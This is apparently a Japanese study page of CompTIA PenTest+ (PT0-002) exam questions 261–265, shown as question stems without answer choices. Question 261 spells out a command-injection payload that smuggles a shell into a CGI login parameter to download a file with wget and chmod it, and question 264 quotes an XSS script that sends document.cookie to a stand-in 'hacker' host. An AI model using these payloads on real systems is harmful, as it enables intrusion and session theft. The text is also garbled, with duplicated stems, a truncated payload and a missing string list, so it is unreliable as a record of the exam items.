PT0-002 試験問題 261
ペネトレーション テスターはエクスプロイトを使用してシステムにアクセスできました。以下は、使用されたコードの一部です。
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
エクスプロイト += "HTTP/1.1"
ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
エクスプロイト = "POST "
エクスプロイト += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
エクスプロイト += "HTTP/1.1"
ペネトレーション テスターがエンゲージメント後に実行する必要があるコマンドは次のうちどれですか?
PT0-002 試験問題 262
Python の次の式のうち、変数 val を 1 増やすものはどれですか (2 つ選択してください)。
PT0-002 試験問題 263
ある企業は、自社のクラウド VM がサイバー攻撃に対して脆弱であり、専有データが盗まれる可能性があることを懸念しています。
ペネトレーション テスターは、脆弱性が存在すると判断し、クライアントの VM の IaaS コンポーネントに偽の VM インスタンスを追加することで脆弱性を悪用します。次のクラウド攻撃のうち、ペネトレーション テスターが実行した可能性が最も高いのはどれですか?
ペネトレーション テスターは、脆弱性が存在すると判断し、クライアントの VM の IaaS コンポーネントに偽の VM インスタンスを追加することで脆弱性を悪用します。次のクラウド攻撃のうち、ペネトレーション テスターが実行した可能性が最も高いのはどれですか?
PT0-002 試験問題 264
次のコードがあるとします。
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐ最善の方法は次のうちどれですか? (2つお選びください。)
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐ最善の方法は次のうちどれですか? (2つお選びください。)
PT0-002 試験問題 265
作業中に、ペネトレーション テスターはファイル内で次の文字列のリストを発見しました。
文字列の既知の平文を判断するための最良の手法は次のうちどれですか?
文字列の既知の平文を判断するための最良の手法は次のうちどれですか?